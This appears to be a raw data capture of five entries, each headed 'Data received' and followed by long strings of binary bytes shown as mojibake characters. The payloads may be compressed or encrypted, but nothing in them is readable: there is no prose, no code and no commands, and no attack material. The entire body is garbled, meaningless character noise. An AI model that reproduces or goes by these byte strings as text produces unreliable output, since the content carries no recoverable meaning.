Data received	P ÆßK¿Ú3öÑà#'-M´îG)_Fá\|"5-\À¢&vGË8×ÁO}P3«w#xÎêeV1bJ¯&BÕÝßñPIc2ÿåøöG½ÈÖãOÌrjÖÁ÷²aÖc»êw2èòÞ Ç}ñ]ñÓ»Lt;ÓhZ 1§¢è}ÄÍÆDÇa7NÀëÔÜ) Vqï§¢ß$²Ä·tÎÁK×â¶?º¨Ò¾(>½ÖvÄsè+#¨iAG¬[dýe/·+ÒÄ§OSàQÄçRæüÎ£]õUdÿBÙs`8gwl]Q<SÒU¯ßÞqBV'OÙ{-Ñ@OÝ¥]Â¤K§ß¢I:ìËõ¡íêxÒë æ«¯¬Oï¼^ÔvÉË49^LB1¸5zß ãÖSA0µ"V§9yÜ³7?KDà¼"'/ÿåÐkÓdUÏÅ;Þ+FåñÚ$## Ïd7ä!2jSßÎÎ¹Iðßéd±»uuÖÌ¨§çzèP«Õ¿Ý¼JÐa(¨á{ï(N¡bB×»beµÍßTõíäåöVOKÂÐOÎÎ»¸"{i±Ãòü¾I«",°©ñÐJêÐxáAg5é»æ9ªàé>@S>è¡8Ç×²»ÀôzîzÀ(ÍL¿çåTÏ¾ø]lDÃåHX¹ZJ 3çLªÌêP-ÏÌ´Ç´¸ÙÌuz!c0öÌÇ¸2yõH'ýæ¹Òri(çWi)«}»¶5TêôéûÙ<þ%o«yõb&©µ{0óï«%äú¦4ÿ)?@ B¥´ýJ¶DÎäÿãX'+~§Ù¶ºßÕÙãeÛ0æR´HßÓÃ&£¨ÍÂã«ÕÃ¿4ÝV'ëWxáò¿ò(Hö=ó¯ç1Ôô6ÒÊLµüvP¢5ÃgÒÍóÄÂcÔVæ½úÄyL5ÈúÞ÷Ëö(Üû;ºÞ0Ëì"Í¶Íüæ4KP ¨Eÿ»îQIÖT?VÚBÏ·fÅ¬ÌbÛ}ü>kÃ¸FG=V§oØÔÖ\'Í«~ 0£OEÉPî.38¿ïìeêøw±QÛíyÐì¯{ea{ );º"JÇ?fx¹ÁøÎV®þ\ýõ-G=øÓiâ^´!²M¾eùÆ·[1;ñ4è³±p³â(Ïâ2â¯fàÃ#z.ñ?Fú0BúßBü-<Ü=!Àg}.BÚfcBäÛg\j{$¹ÇØGâÐO´Í¯ß:khþéSÉ!Z£Þä´ÊmÏÒwZçD-Ý3×@/Ö´rQ%ª÷3³BýºÁÄä¡ÉôS=êñ³é»·ßîªÁ©%Ë úºÔÑ \VÃäí{ä«Æ{ÍYèÛèóÂåâ¼õ úö¢¸A¡ëòNf!)óvàª³àTB`ò¼âÀCCìÐzrJ¹>Ó·:¬ Î\È¯ 8Úãìâ%Ë%NïmÕ@e°èál¢RÀÏCÜ=ÔmBÛ£b&më&ôZ]DuéNì[nx¸ËQò ¢O70dwc±¦îç½cyîõ,nº_éæì½Õd7q3¬ß# Lá'¿j}x¯Ò<UÐ %Ã`IðRc(å 'úFËCD)8Æ×ôNs{Sýß dÎ+°']+ruèïþÒ\Ièöô<«\Æ f1VçKÖÌ{ìük>2i2PhÅZlmzÙ~GÅßòÄÐ¯¼7:(FÚè6kwjÛEïÑÈîÂWeÃÅ©ílX1Çg»ÄÂSº[+!óåã©â¸ ä'AÄw§éHç¼ea< ÄtôÐlËÜÂªyRØ~ÎÎf´ÁÔÙ°C»öçåjR#PàØD:ØàQüÛw2:ïCÂhË8DZß®C89ôïz¤çD©óGøßÿ»c&@«[Çöf7RÜ{oÝ°EçF¼ù%GÿÅi2Çj© ®î¹(í5RìfEØ©Ê8ªMÕi±8ÛDCÆBaT/BÛkýõJ±åÞ¦3'¿÷¥Zô0±TMëzôÈoxt'.'i aR_xGçÖ2I®&f#õ3~ÉÅr'.ÛÚ¶¤ ÜEFÊâ+dÆ{Éü¬ßÁGÓXµ;4¿ç.â[óßy(¹¾õ¾9ýh0+îÇr+mOÛÞsV¿zëÚWÊßü§3}ðÔÁVzCí¿ÊWä¾óç6@±Så§¯¨êT§b[G\|"eÍç¹æçýOZvU$Ù¹ûwSÂöÅó¹cBµ»1 ðÆ:÷nØø]À¥c³¥ýHe¨óêI}ïÂÃ$ê}½fÎ'8Ü[H±¹T¨%¼æ1?xòj(± éÌe©GÄÉLÁ)>7VYª3àµ^ä°#EÂD½¼¤&Ý¨«àêhy»wóÀåÔ?Çfð£¢z¢òèdÓ'2¥VV´V«gçlÀqïHØô;¯ýjr±u'V¸½êurÓ=×ñª©º¤ÛQV`ZñeÇnÀÒÝi«2<ÍÀ» ÙWÈy×PHÜ1j©¬#ÜË~æË.¸¹ù5lÝ»ëøEL41ièu»þj÷çÍiÛ?ßÊ³ÖÞà3ó6o¯#_#D²a<ØìµÐ0i¹"<ç8ãï\|óæ·"Ízà÷ßøvB"÷GÇ:CÒÓåÀ@& é-ËßÏvZó2Ôß¥ÜÝÅ»s¢sµCèÜ»>ì+µüY¹~Qa=Ã_<ãj;ãA3ÓhÐÚçï N©0?¹àæE\fÃßzý69°Sï/vâBUÁßÓ¨ÛÊ44ãA3JO«i¶^_ãÓ#èB}#ã\|¨Î$3-ÝÝÚ Ð°PÑ-ÈÊ','È!Øha} ®Æ ×¿ïz¾¹÷ÆÞâ¿XfOiwFÓk¢éÍVNìGg±õõôõ>Ã^×¨¢drS NþõÙ)çjÒRà¨1d'Ç þ#×Ñg´}ëõ%ÜíA©fé\ùp¢lÝGû(·¯~ \XÓ5Ówþ$ÛÕ@ÓêwvÎû=Ó&F¡µèâöT¢çÕèc½áè°ìýëü×÷db¸þ8êFÁUDe¯ Ú<Ö«Ã³_Õ¶Ý{±X?yÂ¦Xî×ËGÿä{6h¥ç~{æ¶÷ðiÃSá¯Ï¨ì¡ ÔPàðîîïû<è£W~¸³½q }Ò³9Ïdv>¯¼[¥sK·ÉýµÏâÙ¬C®_bpîKãÖ;ÃI¦3¼HÉàðf·búYØS!ñM":zet`R¨â$þkÒéóâ\|§Ìds½,éÇæÚËpÏûvrôúpZÙLÃ$Lr# ¿j°º*c(¬XÖëà~>dHèZÜù0çy½Ù0¼{ÐË
Data received	-Ã¹ %{aW£.ÞwtS?Eyxe³Çïx©7Cycô{Äm¢X]2dS×Ù¼ôS×'#àéû¨y·ü~ün¿dHRN'Ë&ªnêgD#E¯:#gÂf b»%V¥}©Â·À:ÿ¾'¥À_ßHyÀðRÙBsÒ&Ô«¡×ã³Û:@ÏÔs¯³vN§{ Á«Ö¦c¥±6{>Lå¶w&¯õss5DHûäO³;\AÿG±h°0?À`iå¶ ûró£6kû¥æçIºã>õ2Ç»³zßTë·¦yq³÷õ³2÷ìºzÙ8ÓuÂÔâ@s:Hcä³W;}ZSã¡[Ó\es¶ØKÓ<?ÜÂ?Õò2SfâRb+C{Á×eóc±ç6û=Gåç¨ã%£C5ïËÿã@¯Ù¤k7Û³ÿÓ¢8ã®ÁÖ¨c±c6o>´åk¦W&WõSs_cHìäo³(;\|@×Ô³Z ©¾÷ð~ªbúýÆ{ªÁËÖì2{ôH¿y£3Ä/©¨æø°[`Ò°_OÀÁÄÿ°{@>°HqCÀå±f7¦W{&aõgs?HHåS³ Gk_°?Î5[Øk°\|lóº{wB@ûá@º3ê7a¦,q £ÿäÓ {6üïýÓ=âäð¡ÛÓ2]¶áÏÓ#>7áÀ³zÕDââf«'áîòijO¬>Ûd°I?±°OGk°9Ò5K¦ø> >\|/B¦%º3Ä7gÏ»?ØjcqÖùO6:KþãaÚ¢ãü¡/Ô>µä R/oHfòUÕNõSNòSÊÖ[.»ò<¨¦õÀD6´d>åãÎÁ{òE?÷ZPcåã¬¦isåïÌ¦È§¨kóæ£( CçäÓ(s{ãkoc_±_6qW>[=q+éùG,,7êZC(Ôå:ÕsÔVäxHåI³ó=pûãê¡çÓ,#·õëÓ7Hßcâ¿2^>ëåÚ &Ëþ[æ¹ºò{°ò-ä'°ùå?±¦OS\|oÁ.©°>°1\|E¦/z;Å6{?3m÷ozC?Ëjçr=q+Ìùã,S÷"ï\Q@÷1»ãA$WîÂ¯ßò~{¤½ò[p^â¯Âòqå¾½{ÎòoDÿ£¤~ò=>jÀPH±L°^>XÀ\{cÁ¸ÖsÙc±'70>»å!¦)&õsCD£þqY+d»Ë6U;{»´Y2o6¿TFÝMFþ¸i³!j× W;[â5áMè%lOÀ@¾C«¯yËÏñÎ®è3ù-rRá·pÓ·ËÿÅS$TËg/XçtÎ¥òÊ6°H¬y ;&¾C{þ<§%P»Ê4°_ß»»´h4eF2S>¼h¯S,F¨;ÞW³EþÇQþ5ÀþòqShÖé_a4?ü:9_³cÖ¼é_B4E Q-¬¯ è3!U ËY³@Êwb?4»Së#8Îlv¬»¬éPû/Ë¹XA»÷WHþAQ^èC_x²°ÓX2MCE¼F·n CXcØÛg4·¯´O4oÃ¤ÞñRlÞà<üU»0»<¬à3£Uß/Ó=5IÃ`;ûær]W×ÿêäaC¦9Ëºoç3éÿÅS)[-:ÌæN ;4£'tþ:ÌÈ÷s¼obåeÉÖjÇQáú+£bsÕïnCtûaÛB»1Hh=ßIo;Aÿ:ÌNö,Û¿ù-ÿE¯;l?»XßN\|Çhº«_Ï\hÃG\»=ßIK8ø«Hâ-]Í?ôiÂrbþUàÌ"o9¡i)X¿M~Ñ-øÐöÓÅ]bO,0³r,®Z¤(å¯xôÆÞëþV½ÁÝU¯9R&À®/_3äY«Ò(mM<]×xâdð"âjÑÉl-÷/ 3DE£·C®ÎõÇìÛÏóC¿7áDDy¦\|SekÀþõgèÿµc" wßøî<d6ÒÆöÿöqgw6q<:®x%ð·:·øõ±ß6Òà÷w;ÈmÎ§ÕGt]àÇdàZÓ@k7W!O ¨iâ; I5qú"VvZEÂ¹Vrîcú×QVr·÷8Ù_¾ÁGwc·Töño÷¾UrÇ÷ ¸Iþï5ÀÀ÷V`ôr» ¿êÞëSJÕ!ÇwÒOÉë;jMuO»úéK§r¿èò²p7lê°ðþë;òK§²Êçêæ¤Ç3³v³y2OVîK×êa°Ã[ç~aAÃv=9ÀwÖoÀ¸¶µõr·w8sÀ7td¿XúWyØ³VrÖ·wÓ¸ô>s ¿^=Å§ú; Muïâ¶nÛõÒ aëugCPão+äS7à8Ó£Íòº2ñujß¿u®âR·79;_u$DÕ÷@ºtSåØêïû³ =9ÀwpW?b«0b~ÕÇ÷ñÀÅRæÕê´MuÁâw6V2h¸ösïm=9-Àw:X²®³â»Ì8´²ÚúúÛò·&KWOäO¿ºWóG67$`ïu~ôOØ°¯cã:¹9ãÐÇ¤2ã¶YÄªË,rìòM iðèS dàFYìråÈ§kG¬RÓÐY_ðËGmk2OkÔ"}^Èå¼¸)t°º\é¶Bô¯ágF¤"pÄÒÒqçî¥ÂS°ÏA<tÒE.¿[^á23/¢ìQ¶ÒÒÚt3³·2Ë¸Óúty'7s¯ÖT.v¢[3ö²áQä`ÏøÕ#¦·¤÷Ó<¯Ð>Hl OV2¶QÝÏCõtÊS\|Ö÷³Ge/lÄq·ds²´ ~M¦I§òKîúÏÙ¼nYÖÎÙ6?D<¦¥/·^==¼¿¹ )?ïÏ×ÝÔ·ÁRcýÂ6aä¡·ÿÚ\ Ææ¨[Ø}¿ÒßrdGïÒ\|Ï8Áá®ÿ¢äÜP%«üò¦cüØ:°û§WçòÑnäÛåÅÊS? Ðö ¤Ï8á»2ÏSß×êHÊÓt]Dö¿$³Íébv-3/ÞF:÷3$BÐIö£ÎäC ó+`èÑ±ã×4ì¥<3~sòWÕãÑ>ÛÏ=ä009ïÿ®9WÑ¿ ròÀÙ-ÿ·Ñ?8RrSQ§µ¼,Oé8/Gh]fò©ó±\|§úÀAÓ'â³\|3æå÷E©Ø]¥¢.AØÓ_DJ·ªeî¼_²2êo»W+=Ó°ÑFà(Þ#ÓÓ^p¢Ï°«võ·M0 ^,oÓ©!Vüò9?ô~éÅÏ:ßª·B*!Pþ® ÓTÙçc DÓÿÙ6ðÑÕo¬pÚS³¿ORoçÒóºîcÒWØòm+ÏëÑÑP
Data received	i#w5Ç&~éð¶ê\|²U~o3õ¯.ÔüöFç$#¿¯²ßÞ¹¿¯!^´pÇÇ~ê¶²Ögaï½ÒéÐµ2óÑæq¬p_µr£Q±³½&¬R]ÒcK-4Üo:UþvÑÎSX{wOòÁJ\|å}²§cGO÷Ò¬Éý a;utgè3W%ÀàèurÜ úÒP¦ÖÚtAWø»ê¾¯¶³¥]®¬¾¶:HÿWrSQö³Ö¤'öÏ/Av«~²äÞ`ÉÕ/0ÁÜ¶¬Ð2ã±sôã¯ÿïÖwÉcGË7vSyÖÁ¯ÀXç!÷hw¢»Í&l× Ãóò®`ÙÄr_Ó ®dÞrò4AmËîQÆÜd©m½ÒóþcÒ °¶º÷ì74ØI[«Hu×LüÒ´²"]Âá¯%øñºÒ'¤ªM¹É>ÄÒ¢5vòÞ·Çq¯2º)¸j åQýO¨-¯ 3ØÿgÆ¬yE;ø73¥@Ì±Øh?&A(8TH¢.Ô¯I ÷ï R7v.>·§u`ZÂÄ66óoWuó NÄmËnn³7ìIãó©³ø»§çp·ø·R¦³þ¥_»GËÄÒÑ)ð³ñ\ÿÓß%ûïÏ¥¡Ð?ÖgÓR~á}ò EÚOÜR?[2øå26Ü¨×øèÇ:¯¶VWL¸"°³²¾½g¾¸üVö¬_wÒrÒì !«ô5PÃêõ¼3·Ó¨ºEhòs`M\0ÏüQòÒIÄwÏç½RUýQ³ÛËynwÈÏZ#+úQÚ¯»SSSSÏkûQ ³d·Â÷Óïoï/Û¶½5â?3ù°8sµ7J:Õ¬jz³Ôq q7ÝAFeÙòNõT»w3Èòzs-áRLZ8sõ3ò¦ÐvÇç6'iç²PH×¯Ý¨)ÇZr ¬2T;WÅ«ù]¤×Â;vÔÞøÔgÇ´ÉÛ¬ÒQhÃr_¨eöÛÕ´¹kæQG][=WÎ¼È?$ ÏWÖâµój"\|ò~ÂSO÷'KV³£HtbJTÓô$³åUßô·/±e.Ê+¿q»WRÏÝdgÇ RY^Á§ÏHb¢ÏoWRhÖöyÔ¼îå¶\ëRÍáú\| ¨ÏÓ^;}äk´ÙÉÕ04e3Ô)Äú×Ü@YDÎÒ%½½¸¤º 4¾t¸OgA0À¨¶êv"vC 4Ðë´v;íç2.¯ ×uqÄ¨DN?·r¯×ÍÙ.ÞÓÄÞ`ãó~0J¯Îúö©Ö "~PúTîª9üÜNYShaÅIÉ÷§^óZ·dyÜWQóh±0Ì°6\¯Ý ÏRáà¾.#ÔYFúd¸=ÃÕtÓÓ¿º¤4@Ò´Ó\|çt2Ä¬ÞXÏ·ÎoÆª??ÃóûHO¹oFöàzÞûúÑ¿ ÇËÁÝÚ¾ÎaÎËË»Äåbãþ·áH ß© íªaÛÕ¼@áººóÞ¹Õî¶Mtôò%ðÒEþ°ïü<:°²ðcî«aäË©»â¥ÛOé¢açË »ý¾b ÿ¼·Iº «¸aòÕ@øºóõX/óW¼xKOÆëÞÇùÊÍ;:T²wJÀ÷ÿ[OÓ2IÇÙ²ß 7ïMÖîÀÕS@w®ôG÷üOI2 SF²Ú·7Gô¿ãSw â÷ù5O2ï²ÙKtrô:ã²zSóv ÜñööO«2bðª²ÒrbëÕ[¹¶SawÍW`÷óëO=:_=Ktró".¶.ÔOKÛ#°'3»Ú[ÏôïÅØ£ïÇ¡6"È8Ôo,QÐ¿Íß¦NLuÐ8UÚ25\ójÑ©©-Oâ¾YÎÒ¥»kÛ,ªÞ¿YÙùãs¹%? >{Ù°÷£%Ïl(ë¢iHÏG0nÑ]³ÑãqØ%ÍUË´{¼þ3¾MÓ³ ¬û07`q/GÏÓÅ»©I¦ÀUÕÏ×pgYÑ ÑbèWÅó/ÏXÑ6¡$J2ÝrÃÃ¾ãx>²Qõ%?kr[@ó9v¹:2wXo_òzvhRA°1ßÑ±Ñ«ÃE/²==²çjîWO¯¡ò&©y?õ·Øúz,¢JÛÖCñ[d?¨lj\òäBüA\ÒòËmGÑM¯¶ãZº?ÔcÜû`âÏ«¿$ÝrJÛWÓ@#7¾¸¡ão9IQsQMÌ9øqÒ#üì%ÔbQ¢þáØa0W¢¸º\öÃ99¯D¹ó¶tæF!Mwâ#ÿþPd0ºnÆe/û°JÖÝã(çdùRáöÒüUb±n?Ô±\|fÙÉxrZwò[ÝfL¶ÂåÊe¾§·ðJòôæG£ÎÃ÷õÒòÆ ÈzóEFbè¶L7«tñy²Ó=MéoÝáà7Ûo·f³dDöGòhõó×lâ+¬uâk×ÂH\×îc=¦ÓV·RX[¹Ô.Ð#¯ùêêöÒâ_{9ãvzWª·Pw^nèYãTxôcAáSoG¼l½1álCÒ¦Õûú^WÀ;VÍC¢ÏD+¡¦×ª·MsWKñÛb´QÕ@J·³6ÜÓnu¹OßòÔH°ò>ú'VïÂâÛÃûÈÓuO\|Æ¨¿i°t¨ã¿½î²ut«Vº=ô±,8³Óð#§ÂÅÎS§ÂÀËÝ%æ&óá×çWÑèÇÏ§úHÒçÑFQ¸£ÍóM¨ OO½¦b$¦¹zøwOÛ'oRôRP§H¶Ò ëÀwÒ5ï2º¹ª®ÔF±_5Òø¼ÄK¸`ÙÑ£s¯¶¾bmí£ûc,Eò¹,/Ê°+:¡·øJ¿Îºur³MéF/Ù=ãÏÎ_vlH[³J2;Cæ¦Ï EÇ¸ø7ÖÊhÙv`2BôÒ+£T¸Òåt,¶28fúÛX¯!nI°ù¿[ØÏúP¶[IuÇ/`·RæóÉVªÁwç_Ñ%ÉÖ2B7ô§1bIQXeð²ã3HL0Ôõz}ÛEs QäkÐ·U9äãÜ_±ü»µA~áxóV±ÿÂêY~Ò@ö¥®'¿ÂÓ¸¿_÷{¼{á¦úO dcSÌÿ`®}z³²6Î\|\|ßÅß0Ï\QçQ»;-sÓ3ËºÃÍmWæ×1sCvúõÐyróHBëÝ}vðÿcÀl°ÊjE-·£?3AêÈb"úo®òeæ6ûâ.=Tç×2jôz"?Z!¦âWÕô{iE,Í@fÛ^§ò%4ÇX¹\|]!ñó¯ÿ>37
Data received	ûE.çRO¸ºó)8×-¨Zî%[Y(¿¢CèyeSþç_33L²NÙ9>©ß¤ïÎN4ØîÝÇlÄ3¾æ_þ9{/¶ïJï-ri«6Þë¸HÒ>~áV?)uN0ôÁ:ZKè3N5hjëÙ1:ì_{qÒi_ÛBÇp@·%º?Uðrå_ÞØºåqs Ã^ðRufYÔMÃ !Â`o¹´Ù`¯ÇLùÉÉ{éû°¡ê-6ôøÓ2(c9Zÿ/8p_9Þºáîl"l1½¨w°=÷ [ÅT¬y¢(î¸#²Òºdó¸Á-#§k!âvî"øÌHÎK(«5ß'2vî`övÌ-~zï YëË×NÔO½y)'ñp%Ã$GÀ?øÖÒÞVZ;(:¾hpáâNº IªeUgf#`Æë)!h5Ä ûïãtNë'ª9}jã$óÖÄ¾aâ!Û+®Æ½æ+_« âóîçeåâ/aºëk2O%ßYpB)÷WÇ#!%«§TOüÒ,ëËÜþÈ¦O/æÉö¸½ÄÅëeÎ îµùbiUØö2õIg»~¬ñODÇós( u5¡-Þ+rÉô^Ô'}¼1·\Zq'm-}²ÌwYè¯Xå_ã«-1B§:î£_sÑ§_n¢/û xË%>FiU-6j{ì°)Á!'Ë¸Wkûü+>ìQ»úW³©ªú¼$¥5²¬KÉ1_?õb¬eéddÌéÊÒèø¤«S×ÈKJâßSî¯Y¿ÝÕ."¯¸uv5RÝlNó¾ÎHÒ§Ç®b2ÿÉpêúJæWê)xÏ^oRb`Å-Ù¯aâ1ïTYßOøK¹Çf£Ð¿V2ZÆ× ÁUE¬±÷fª%)fÜ°òæÓêö<8÷"Vë°QÉo3ùÄ!Ö²Y ÷0Ýùæ@PHßý 3éwx>¬¡²ùæ.rª#+tÅö20KÎ{æÉNó6LÀ_¯rëÜª[NÄãØÆ &÷ )Ûs]ó®Ïb aÃÊÑÖÙÂxðO{ ñçIÂÅUv§ÿû©÷ööYñÁÖn OÒ¿e+ÿÎ¼%ßÔj° 1f±¾'áyÀÄêïøOÑÉøèH£º¸b¢ëåÚ§âÄ~'PÈ`Ciÿ ÂÙ-xÎHnï»þh;Jg#$éæ¸5BÿÌe!TôÁJ-ãË·^¯P¼9å ¸ò¤ï($:Ð&NÊ/;ñ+AùRG/;¿1×b6u§q8iuÙ}\³Éýf"w±t!âÔ[Pê(·IÒ6¼ ZÿýbÒêwØ,=r}q/IÞ×ÃgÓRCª ØbHÂÎ$²V]EN/ÐwW¢L91ö$ÝÉñ°!Ö}Î¥^ó1úkaTËvoRU1ZºÂ~«PÂhiùaLhM¹ Øê¶;Çò#â(Ê Jì×& FZSþ)úÒÕtÆÇ÷ïþ¢ îõÿ_¬ùâÇÕEÛ1ÑÑ%ÝÇ\|+äxø¡Ò¬«ËÉÔÊIÔCZq8¥B`_å¥þjQ n)?Ñ÷jçðº´ïH¬.C="#½XzÊ&òçRx ²EÇ%×FÖëA}âfpæï:ê-+<@@¿òêljbDèkÒ¾^\|IWÇº'UÌ²q÷Ë\ñÉö¥É_FÙ Ö1Îùî¤Ùù]!(ÎÀ=É·°©Æ!ZÁ4 ºçOG/¼%çßW»n,AJè?ËÙ·ifÉ'y>ó¾ÍlÕïç%KJ1 ì0¤è·Çö$ÖèÈ¾h¸bÿqè¦%VÄîª¬?¦£,¢öÿ1GÂS0ªÑNï»Oû h{%B¡d+ JUPÚ ¶^WT¨áT²`{wì¹ÎYh=¡l:¿ ifIUyx_JûSòãÑÝÅ9$½0 ^ÄÝåIUuFXönQ¾ Yb÷Ñ¸VS<ìà§¿]bù-hÈw2U^S´)4¸e"1ûÈWÀçQ¹ö{?Ñ÷Òú"ÏYøUÌ\\\à(2s%÷d~ÁÕJr/u¨-ÇñU¸÷¾ø!¤¶(K«ºt¬xú$T:PRTu9ÆÕòêòR¤ËDZ\4Â÷f=çØÉÙ³Ç5Aé 8JB üËÒHIP¹\Ôâý»ÑîÇph¨uc^)ð¼Î8÷xÁîºÆ70»À£uÝ¹B¯~òAâ Ê^P¸KX\)Î<!ß¾úâ¹¾¢®`H?òÁXIÙ÷Óñ±+æéVP/eµ&hj}ï=P_ÝýGÁ@V¾IÛ°)÷^u!R9¿XA_Á0öSh#Lçi®ËzIx+àkµ2þst3äÿvÀöJñï{1Ø[Rº ÝÁâûò}3Yc)$ÐZI%Æ\'1ñEíPÈRNØûè ZXY1tç øÉûØÉ5K Kë]dXòÉËÉûÔ×Ïý õ:¾réêöÚXÓêf¡-ºxÿÑiñ&^)I:ìkÓïÿ¾º-<^î-¥{bA¹Ô§Z Ó×7±$ø£(OàÀÀ&n!º =¿ÝFJ%ËÀØ³1ó¥ì{à]¶¯å-)ûðÉ V`à_çç1× Ð¶n{VK»ca¥ã$ k'áî)ú/¶-Çÿºa]Y¡Äè®ªòZ(ZZæþ/ÊZQøEDï%!Èÿ$1»ßåÇïÓØæF6øîµED+úÆ»µHÊÑÕï¤j¸8'_víx¤GaNö>* áK^Ñåî-¢¿ 1ÎïR{º¢p]SîdØñ1¬gè!~Ö\öå 8éq5Mºf4n,vò£4O¿i"o¹ >K²_uÊêiÞªX¸ ½ ¤Öh-æÒîÙ¦zÕîÝõD¯ì«% ×LKòeñöN¡lìÎ°ö!ñþ=rä 3 ÁwÆ]_÷ªV:üEÊÙ) æì$1þ'\|öZ÷ ÙÆs½ ¿<'õ:Bîú-[ïÅ«2ðT!Iugá¶¥Kãþ²©§+®,Çá"òÓ¹~èô%ë]hùI¶)þ(ÃqÁI~«B+wQLÂµñ\|b1lü>züiÝ/wëS Ú%!þÿ³Âd ý?BV /¥öøºÅî¸öàºÞeæîè¿ôQÉß2µUlÀhËlrU-.:âèX¢Æ×fr¶~B9¿G !òUSæ^RE» ãïËwe )ÆV¾-{N\|ìZtt¯¹Àë§û\|½,êo;!!ÂH))Ò:úçZ)Ínã~ UÃúuú¢»öûKì Ðkx]:Oei¥WÊÕWfn_1½®ò^ª)¯ =¢(ïa ×¾8ûñ³Z
Data received	i¨VK÷IL/ò å'3xìãÓú{®e -û]ù«b!óÅ=>-áüX1Ú² ÛÜbÈ_Þ-¥ Ë·þyçn¶TÝÙ!(Í5®² â_ÿMBª?Éê9'(ÖÀ_ÛÃ&)ðGËWä¨- Øûù;Á)Ã²æX!ÏÓ¤ü$ÊänB)ßÝå&lR¿:äÀ½²GÝÑ¾GÇ®w×Löº¤2}ówYÝ1èjr§ÖºÙrÞÉë÷¤-Êu¾ekÜÜz×S¯mÆp-þb~XÉBNõÑÒè«NÖ8CpìªZ\ÛRÒö{ZXñ ÷³OÄî§lÖNê.t/<$#òÖÕlJ¢ÎÂÛ×ó/ÛðBn/¾dµº4áÎ+ñ¥2ê Ri¨$5þÆZQÒ¬6%Sr%öôÄ2¸Jæ¤Ë[Ã¼T±!óÿtæ»¬þñÑåI±ìk£w_ÙôÂ×²uáXæ5JëË'âôéßÌA\@¥®³Ó¶'éuÅ7ñ '}UÿbFR·XNØÔï¶ñb!Ùÿx¿ÙËN²»fSQþûÖ8½KùYú!Þ \\|á/ÂA?ï?=Ù.Åëü¸¥`«7÷'2,TÓº&×EÉ}CËkOéê,¸:øJò¬ä©úÉçÝyiKö4Æ'º}~0SÆ£D;Jÿb#öóU%öXeþ½û3ô ø%9¼ç(ex5(¿YìXÔºcßÓæëÊÌA:ª(óMÐÜÖ!±û>)Ö(Ó$øÉÝÂ¤]~BëÙÊÂ«æjÇ#-s;¿-ÊlËO3L¡@¡ó£Ýj"%²röARÒøv$rnAJÎ¨ÓÇ»u´S~¦jJãE- ÕJWÒüªNRpñ^çP)Ù®ÉP^²õ+âA¥þÌN-5y¨Cë3Ö]b¢ÖfR1ëî%ºÉ {-Cü×²1ñµòãlXá8¹_,bï¿1ÔÊáAÒ}Gì¬þb1ÛW²wôíËÿµ¸8-$¹ÑhÐ/î\|ôAKWLûé²ÖÁZØËú 2ø!l `K%¯$-Ôiùü À VéyÏ7ð!Ð:¡/h®«-\g¢Zfª%Uí%;¥0ÎSq3²V3-8:Î-³!õ¹èºû?()NÆ«cÂýÊ×SqÄªÂä¸+1ÒÑöë÷¦_Ê§fJÀê½~[Läê£)îìèâ÷ÿ13ß¯ÖFu¹µ¸,ÁnYµvÂ:ï öÖãXÑÒJ¬:¤ô1^¬_²îf×Úá:n5ó{û¨T¼º X´À(ÕÒÉù£ÈÛÔê=+ÿ.RN§'!^¸Â1À}tz\|Íiwâ ÷¸%Á¼¤â1ö^èl¢äc÷NjÌT ;ÇÞ(3[±ObgÅÑ½¬Æ$£É¿UÌzbßfHÁRLÅ3'7õÐýî³f?Kÿn^BèçÖýÌ%¬¸/1Öæ%pñû.bJ¢t wÊ9TnÄÃæL9a¹ºË^â üØ¸¸WyOþç'ïÔfZ²Ý)[ßqXfH·û¿^:Y.òÊÃ¿Æ)îNÞ£»+æ/ö]:P\|Ó^öþ(uë¿±,ÁQÃÎ_(0_+pX/îHu±,É > UáõÅA ÿ^°ký¤7)¬å¥³4Æ-ÚDCx.ÕÏ¢d:²k$î³Ñ{Â¹þÕqÏIß³ÂÒÞì×lsft¿cÿW~?I:f×Å©¥Ùoi]L4}B°ÐRUN».ÅöwY3¡?)Àl¯Q¦Ð!Þ-©@î/+fü¨äî! Ø,FÄÆüG-ª-í1§Röfè°@÷í%Ý¨ÿòH8²%Fâ^ö°¨Îö{Rtz@? '¿_:tG9+@"/Ynif"â½à«ê 1È]È[BðÿS/Õ´DXd ¿âwËÇÑêbÁ )²îÌÈ5[0.¯$^V7JÊ50^%u(!ÈÐþJ÷¹Ë±¸ (L Lÿ[ëÓò1Ðù®Ê-0 ûÌôÂ³74¯ëæNâ¨ Ûº¢~%çWeNó»ò©~î%ñÉÄ´êÓòßd¯ Þ$IýN+XTá-3°òÆ!ÐÀ? )øè[ÖÚÈ ×Æ_1¿}0;f 0Ûr/ôËë^d¾¨Pø[µs<5ÊNÝT>¼rëÝâ¦}bYÃB3>ý®¿\|þR]ü[¦ë%ÔÐÁª¢ÿ¼}TïÉõÐv¶éÝY0)ñ»mÕ2ÓëôÞÙ¡ 'q7¥q+)ß÷1Qé~ø(±!þkØ?óåo e {¸Ú§ÄãëâÄó²Êû£$êËY5ÿÁ>è\|µ®â¸}s·ÝÁLÛ¿¸÷Ö¼æZ¨¤«²8NPZ ñßEÒ&"kpT:!÷r0hë$!É½[©'Ý$Ï}RÎ!²À¶Z¿bU:·tum>n FÉýÊUÜq/§ó8¶ ñ å÷)ºRw¸uÿªßb ]]A«Ãd³ïì:Z^aþYÎ¡Ô)eõGÑ1u(MÒ-å-ýCØJñ¯añp*uØ^÷¢öpòõçZ@ÊÒáèDwìõ§ò Êt'óïïâëæÎß°OapZ?é-Â-ÕÅqçyKD¿5û3Hù²þQ»éªÊ'¿ÿ[rî¿Û'Éê-/î4/îò^IñOËð1±ò;½ ÒøÓ»rþ¹ÕS¨ 1ú)ðÔZ£q&ÚX1Ï%+I!ðXÀÀ59L%ñÌIUïhÚ1ÉØÄé" Î7ÜëeøúhOìûJØrï¿en wwB÷Å3ºâX¤!ÿú¾\|N»uúâäO©o±!ßAó1ÖtW%×Cµ¿ËÒ&+Õ¤SÂ ÓW1½Ö.çIì]ÀÆ)¾¿G-% ¸°×Ã/" U±Ç8È#¯Ô¹Ý( 1Û1ÿ@N¨ð±1o;Fp->8¾î+J8©Ö~îÄ%Ât3RAÑ½0G;»Yi^i] ùÌi:Y³+:L'þÎ¿ñ\|b1ð]ùß'rûOdY¿çXãBI4Â)Â]u2¼\[ÌKö-ó¤Ëw9ëÝ&Éo¤ EÂK»%^ñÏ)6ÕÅf:o³`î ÿ÷ "Âü¦BðÔòRò\6ïOÙvýþiBÑ¿En'Õ6ÍõÖlù¥êb«(}ÆÛÿ7!ÆlBv µr² ®\àqþ.æÑZêd¶(_¸ÜçÚv¹ \¼R2ÂÍÞ'Qè\|ü$Û, ³l2y: 